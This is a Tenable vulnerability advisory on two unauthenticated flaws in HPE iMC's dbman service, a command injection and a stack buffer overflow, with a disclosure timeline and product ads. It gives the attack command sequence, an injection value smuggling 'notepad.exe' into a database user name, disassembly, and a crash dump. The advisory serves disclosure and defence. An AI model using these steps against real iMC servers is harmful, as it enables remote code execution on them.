Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

HPE iMC 7.3 E0605P06 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Command Injection in dbman 
The dbman process (a component of iMC) defines command 10018 (hostRoleSwitch), which is used to set configuration variables PrimaryHost, BackupTime?, and BackHoseIp in dbman.conf. An unauthenticated attacker can use this command to inject other dbman.conf variables by appending those variables to the BackHoseIp value specified in the command request. For example, the attacker can specify BackHoseIp as '127.0.0.1\nPrimaryDbSaUserName1 = foo" -F & notepad.exe & "' to inject a malformed database user name. If the variable appears more than once in dbman.conf, the first instance will be used. Since the BackHoseIp variable appears relatively early in dbman.conf (the third variable after the Language and EnableDbman variables), the injected variables will overwrite any existing variables except Language and EnableDbman).

The attacker then issues a command 10000 (SendBakConfigFileReq) to reload dbman.conf with injected configuration variables. Finally the attacker issues a command 10002 (ManualBackupDBase). As part of the backup process, dbman attempts to access the database using DB credentials configured in dbman.conf. Because the attacker injected a command (notepad.exe) in PrimaryDbSaUserName1, the dbman issues 'cmd.exe /c osql -b -S,1433 -dmaster -U"foo" -F & notepad.exe & "" -P"" -n -o"C:\Program Files\iMC\dbman\bin\dbop.sql.log" -i"C:\Program Files\iMC\dbman\bin\dbop.sql"', resulting in notepad.exe being executed. Note that the above scenario applies when iMC is installed on Windows with SQLSERVER as the backend database server. It's reasonable to assume the exploit would still work (with some tweakings in configuration variable injections) for other iMC deployments, as dbman invokes the system() function in the runCommand() function.

Unauthenticated Remote Stack Buffer Overflow in dbman 
An unauthenticated, remote attacker issues a command 10018 (hostRoleSwitch) with a long BackHoseIp field, resulting in the BackHoseIp configuration variable being written to dbman.conf. Each configuration line (variable name and value) is limited to 0x400 bytes (including the terminating NULL char):

[...snip...]
.text:00444726 push 400h
.text:0044472B lea ecx, [ebp+var_sb400_line]
.text:00444731 push ecx
.text:00444732 lea ecx, [ebp+var_fstream]
.text:00444738 call ds:[email protected][email protected][email protected]@[email protected]@@[email protected]@[email protected]@Z ; std::basic_istream<char,std::char_traits<char>>::getline(char *,int)
.text:0044473E mov [ebp+var_55C], eax
.text:00444744 mov edx, [ebp+var_55C]
.text:0044474A mov eax, [edx]
.text:0044474C mov ecx, [ebp+var_55C]
.text:00444752 add ecx, [eax+4]
.text:00444755 call ds:[email protected]@@QBEPAXXZ ; std::ios_base::operator void *(void)
.text:0044475B test eax, eax
.text:0044475D jz no_more_lines
[...snip...]

The attacker then issues a command 10000 (SendBakConfigFileReq) to reload dbman.conf with the long BackHoseIp variable. During dbman.conf reloading, the long BackHoseIp value (i.e., 0x3f2 bytes) is copied to a fixed-size stack buffer of 0x12c bytes:

[...snip...]
.text:00444DA7 mov edx, [ebp+var_psCfgItemValue]
.text:00444DAA push edx ; Source
.text:00444DAB mov eax, [ebp+arg_pOutbuf] ; stack-buf of 0x12c bytes
.text:00444DAE push eax ; Dest
.text:00444DAF call strcpy
[...snip...]

This can cause a stack buffer overflow:

0:008> g

STATUS_STACK_BUFFER_OVERRUN encountered
(3e24.3c34): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\iMC\dbman\bin\dbman.exe - 
eax=00000000 ebx=00000000 ecx=0165efcc edx=0165ee91 esi=00000000 edi=004ca160
eip=7431a4cf esp=0165eff8 ebp=0165f084 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
KERNELBASE!UnhandledExceptionFilter+0x3d0af:
7431a4cf cc int 3
0:001> kb
 # ChildEBP RetAddr Args to Child 
00 0165f084 004a87b3 004ca160 0ebde030 f1421fcf KERNELBASE!UnhandledExceptionFilter+0x3d0af
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0165f3b8 0044dedb 0165f64c 0165f64c 0165f668 dbman!std::_Init_locks::operator=+0xccb
02 0165fd38 41414141 41414141 41414141 41414141 dbman+0x4dedb
03 0165fd3c 41414141 41414141 41414141 41414141 0x41414141
04 0165fd40 41414141 41414141 41414141 41414141 0x41414141
05 0165fd44 41414141 41414141 41414141 41414141 0x41414141
06 0165fd48 41414141 41414141 41414141 41414141 0x41414141
07 0165fd4c 41414141 41414141 41414141 41414141 0x41414141
08 0165fd50 41414141 41414141 41414141 41414141 0x41414141
09 0165fd54 41414141 41414141 41414141 41414141 0x41414141
0a 0165fd58 41414141 41414141 41414141 41414141 0x41414141
0b 0165fd5c 41414141 41414141 41414141 41414141 0x41414141
0c 0165fd60 41414141 41414141 41414141 41414141 0x41414141
0d 0165fd64 41414141 41414141 41414141 41414141 0x41414141
0e 0165fd68 41414141 41414141 41414141 41414141 0x41414141
0f 0165fd6c 41414141 41414141 41414141 41414141 0x41414141
10 0165fd70 41414141 41414141 41414141 41414141 0x41414141
11 0165fd74 41414141 41414141 41414141 41414141 0x41414141
12 0165fd78 41414141 41414141 41414141 41414141 0x41414141
13 0165fd7c 41414141 41414141 41414141 41414141 0x41414141
14 0165fd80 41414141 41414141 41414141 41414141 0x41414141
15 0165fd84 41414141 41414141 41414141 41414141 0x41414141
16 0165fd88 41414141 41414141 41414141 41414141 0x41414141
17 0165fd8c 41414141 41414141 41414141 41414141 0x41414141
18 0165fd90 41414141 41414141 41414141 41414141 0x41414141
19 0165fd94 41414141 41414141 41414141 41414141 0x41414141
1a 0165fd98 41414141 41414141 41414141 41414141 0x41414141
1b 0165fd9c 41414141 41414141 41414141 41414141 0x41414141
1c 0165fda0 41414141 41414141 41414141 41414141 0x41414141
1d 0165fda4 41414141 41414141 41414141 41414141 0x41414141
1e 0165fda8 41414141 41414141 41414141 41414141 0x41414141
1f 0165fdac 41414141 41414141 41414141 41414141 0x41414141
20 0165fdb0 41414141 41414141 41414141 41414141 0x41414141
21 0165fdb4 41414141 41414141 41414141 41414141 0x41414141
22 0165fdb8 41414141 41414141 41414141 41414141 0x41414141
23 0165fdbc 41414141 41414141 41414141 41414141 0x41414141
24 0165fdc0 41414141 41414141 41414141 41414141 0x41414141
25 0165fdc4 41414141 41414141 41414141 41414141 0x41414141
26 0165fdc8 41414141 41414141 41414141 41414141 0x41414141
27 0165fdcc 41414141 41414141 41414141 41414141 0x41414141
28 0165fdd0 41414141 41414141 41414141 41414141 0x41414141
29 0165fdd4 41414141 41414141 41414141 41414141 0x41414141
2a 0165fdd8 41414141 41414141 41414141 41414141 0x41414141
2b 0165fddc 41414141 41414141 41414141 41414141 0x41414141
2c 0165fde0 41414141 41414141 41414141 41414141 0x41414141
2d 0165fde4 41414141 41414141 41414141 41414141 0x41414141
2e 0165fde8 41414141 41414141 41414141 41414141 0x41414141
2f 0165fdec 41414141 41414141 41414141 41414141 0x41414141
30 0165fdf0 41414141 41414141 41414141 41414141 0x41414141
31 0165fdf4 41414141 41414141 41414141 41414141 0x41414141
32 0165fdf8 41414141 41414141 41414141 41414141 0x41414141
33 0165fdfc 41414141 41414141 41414141 41414141 0x41414141
34 0165fe00 41414141 41414141 41414141 41414141 0x41414141
35 0165fe04 41414141 41414141 41414141 41414141 0x41414141
36 0165fe08 41414141 41414141 41414141 41414141 0x41414141
37 0165fe0c 41414141 41414141 41414141 41414141 0x41414141
38 0165fe10 41414141 41414141 41414141 41414141 0x41414141
39 0165fe14 41414141 41414141 41414141 41414141 0x41414141
3a 0165fe18 41414141 41414141 41414141 41414141 0x41414141
3b 0165fe1c 41414141 41414141 41414141 41414141 0x41414141
3c 0165fe20 41414141 41414141 41414141 41414141 0x41414141
3d 0165fe24 41414141 41414141 41414141 41414141 0x41414141
3e 0165fe28 41414141 41414141 41414141 41414141 0x41414141
3f 0165fe2c 41414141 41414141 41414141 41414141 0x41414141
40 0165fe30 41414141 41414141 41414141 41414141 0x41414141
41 0165fe34 41414141 41414141 41414141 41414141 0x41414141
42 0165fe38 41414141 41414141 41414141 41414141 0x41414141
43 0165fe3c 41414141 41414141 41414141 41414141 0x41414141
44 0165fe40 41414141 41414141 41414141 41414141 0x41414141
45 0165fe44 41414141 41414141 41414141 41414141 0x41414141
46 0165fe48 41414141 41414141 41414141 41414141 0x41414141
47 0165fe4c 41414141 41414141 41414141 41414141 0x41414141
48 0165fe50 41414141 41414141 41414141 41414141 0x41414141
49 0165fe54 41414141 41414141 41414141 41414141 0x41414141
4a 0165fe58 41414141 41414141 41414141 41414141 0x41414141
4b 0165fe5c 41414141 41414141 41414141 41414141 0x41414141
4c 0165fe60 41414141 41414141 41414141 41414141 0x41414141
4d 0165fe64 41414141 41414141 41414141 41414141 0x41414141
4e 0165fe68 41414141 41414141 41414141 41414141 0x41414141
4f 0165fe6c 41414141 41414141 41414141 41414141 0x41414141
50 0165fe70 41414141 41414141 41414141 41414141 0x41414141
51 0165fe74 41414141 41414141 41414141 41414141 0x41414141
52 0165fe78 41414141 41414141 41414141 41414141 0x41414141
53 0165fe7c 41414141 41414141 41414141 41414141 0x41414141
54 0165fe80 41414141 41414141 41414141 41414141 0x41414141
55 0165fe84 41414141 41414141 41414141 41414141 0x41414141
56 0165fe88 41414141 41414141 41414141 41414141 0x41414141
57 0165fe8c 41414141 41414141 41414141 41414141 0x41414141
58 0165fe90 41414141 41414141 41414141 41414141 0x41414141
59 0165fe94 41414141 41414141 41414141 41414141 0x41414141
5a 0165fe98 41414141 41414141 41414141 41414141 0x41414141
5b 0165fe9c 41414141 41414141 41414141 41414141 0x41414141
5c 0165fea0 41414141 41414141 41414141 41414141 0x41414141
5d 0165fea4 41414141 41414141 41414141 41414141 0x41414141
5e 0165fea8 41414141 41414141 41414141 41414141 0x41414141
5f 0165feac 41414141 41414141 41414141 41414141 0x41414141
60 0165feb0 41414141 41414141 41414141 41414141 0x41414141
61 0165feb4 41414141 41414141 41414141 41414141 0x41414141
62 0165feb8 41414141 41414141 41414141 41414141 0x41414141
63 0165febc 41414141 41414141 41414141 41414141 0x41414141
64 0165fec0 41414141 41414141 41414141 41414141 0x41414141
65 0165fec4 41414141 41414141 41414141 41414141 0x41414141
66 0165fec8 41414141 41414141 41414141 41414141 0x41414141
67 0165fecc 41414141 41414141 41414141 41414141 0x41414141
68 0165fed0 41414141 41414141 41414141 41414141 0x41414141
69 0165fed4 41414141 41414141 41414141 41414141 0x41414141
6a 0165fed8 41414141 41414141 41414141 41414141 0x41414141
6b 0165fedc 41414141 41414141 41414141 41414141 0x41414141
6c 0165fee0 41414141 41414141 41414141 41414141 0x41414141
6d 0165fee4 41414141 41414141 41414141 41414141 0x41414141
6e 0165fee8 41414141 41414141 41414141 41414141 0x41414141
6f 0165feec 41414141 41414141 41414141 41414141 0x41414141
70 0165fef0 41414141 41414141 41414141 41414141 0x41414141
71 0165fef4 41414141 41414141 41414141 41414141 0x41414141
72 0165fef8 41414141 41414141 41414141 41414141 0x41414141
73 0165fefc 41414141 41414141 41414141 41414141 0x41414141
74 0165ff00 41414141 41414141 41414141 41414141 0x41414141
75 0165ff04 41414141 41414141 41414141 41414141 0x41414141
76 0165ff08 41414141 41414141 41414141 41414141 0x41414141
77 0165ff0c 41414141 41414141 41414141 41414141 0x41414141
78 0165ff10 41414141 41414141 41414141 41414141 0x41414141
79 0165ff14 41414141 41414141 41414141 41414141 0x41414141
7a 0165ff18 41414141 41414141 41414141 41414141 0x41414141
7b 0165ff1c 41414141 41414141 41414141 41414141 0x41414141
7c 0165ff20 41414141 41414141 41414141 41414141 0x41414141
7d 0165ff24 41414141 41414141 41414141 41414141 0x41414141
7e 0165ff28 41414141 41414141 41414141 41414141 0x41414141
7f 0165ff2c 41414141 41414141 41414141 41414141 0x41414141
80 0165ff30 41414141 41414141 41414141 41414141 0x41414141
81 0165ff34 41414141 41414141 41414141 41414141 0x41414141
82 0165ff38 41414141 41414141 41414141 41414141 0x41414141
83 0165ff3c 41414141 41414141 41414141 41414141 0x41414141
84 0165ff40 41414141 41414141 41414141 41414141 0x41414141
85 0165ff44 41414141 41414141 41414141 41414141 0x41414141
86 0165ff48 41414141 41414141 41414141 41414141 0x41414141
87 0165ff4c 41414141 41414141 41414141 41414141 0x41414141
88 0165ff50 41414141 41414141 41414141 41414141 0x41414141
89 0165ff54 41414141 41414141 41414141 41414141 0x41414141
8a 0165ff58 41414141 41414141 41414141 41414141 0x41414141
8b 0165ff5c 41414141 41414141 41414141 41414141 0x41414141
8c 0165ff60 41414141 41414141 41414141 41414141 0x41414141
8d 0165ff64 41414141 41414141 41414141 41414141 0x41414141
8e 0165ff68 41414141 41414141 41414141 41414141 0x41414141
8f 0165ff6c 41414141 41414141 41414141 41414141 0x41414141
90 0165ff70 41414141 41414141 41414141 41414141 0x41414141
91 0165ff74 41414141 41414141 41414141 41414141 0x41414141
92 0165ff78 41414141 41414141 41414141 41414141 0x41414141
93 0165ff7c 41414141 41414141 41414141 41414141 0x41414141
94 0165ff80 41414141 41414141 41414141 41414141 0x41414141
95 0165ff84 41414141 41414141 41414141 41414141 0x41414141
96 0165ff88 41414141 41414141 41414141 41414141 0x41414141
97 0165ff8c 41414141 41414141 41414141 41414141 0x41414141
98 0165ff90 41414141 41414141 41414141 41414141 0x41414141
99 0165ff94 41414141 41414141 41414141 41414141 0x41414141
9a 0165ff98 41414141 41414141 41414141 41414141 0x41414141
9b 0165ff9c 41414141 41414141 41414141 41414141 0x41414141
9c 0165ffa0 41414141 41414141 41414141 41414141 0x41414141
9d 0165ffa4 41414141 41414141 41414141 41414141 0x41414141
9e 0165ffa8 41414141 41414141 41414141 41414141 0x41414141
9f 0165ffac 41414141 41414141 41414141 41414141 0x41414141
a0 0165ffb0 41414141 41414141 41414141 41414141 0x41414141
a1 0165ffb4 41414141 41414141 41414141 41414141 0x41414141
a2 0165ffb8 41414141 41414141 41414141 41414141 0x41414141
a3 0165ffbc 41414141 41414141 41414141 41414141 0x41414141
a4 0165ffc0 41414141 41414141 41414141 41414141 0x41414141
a5 0165ffc4 41414141 41414141 41414141 41414141 0x41414141
a6 0165ffc8 41414141 41414141 41414141 41414141 0x41414141
a7 0165ffcc 41414141 41414141 41414141 41414141 0x41414141
a8 0165ffd0 41414141 41414141 41414141 41414141 0x41414141
a9 0165ffd4 41414141 41414141 41414141 ff004141 0x41414141
aa 0165ffd8 41414141 41414141 ff004141 776662d7 0x41414141
ab 0165ffdc 41414141 ff004141 776662d7 00000000 0x41414141
ac 0165ffe0 ff004141 776662d7 00000000 00000000 0x41414141
ad 0165ffe4 776662d7 00000000 00000000 69e4345e 0xff004141
ae 0165ffe8 00000000 00000000 69e4345e 00f6ef40 ntdll!FinalExceptionHandlerPad7

And the !exploitable WinDbg extension command shows it's exploitable:

0:001> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000003d0af (Hash=0xdaf335ab.0x3924b8ee)

Corruption of the exception handler chain is considered exploitable

Solution

A solution is not yet available.

Disclosure Timeline

12/07/18 - Vulnerabilities discovered
12/14/18 - Vulnerabilities reported via email. Tenable reminds HPE that their public key has an expired in 2017 subkey and therefore is unusable. 90 days set to March 18, 2019
12/14/18 - HPE acknowledges receipt. Promises Tenable a case number next week.
01/23/19 - Tenable asks for an update.
01/28/19 - Tenable reminds HPE that today is the 45th day.
03/19/19 - Tenable reminds HPE the 90 days has passed.
03/19/19 - HPE indicates patches are in test.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.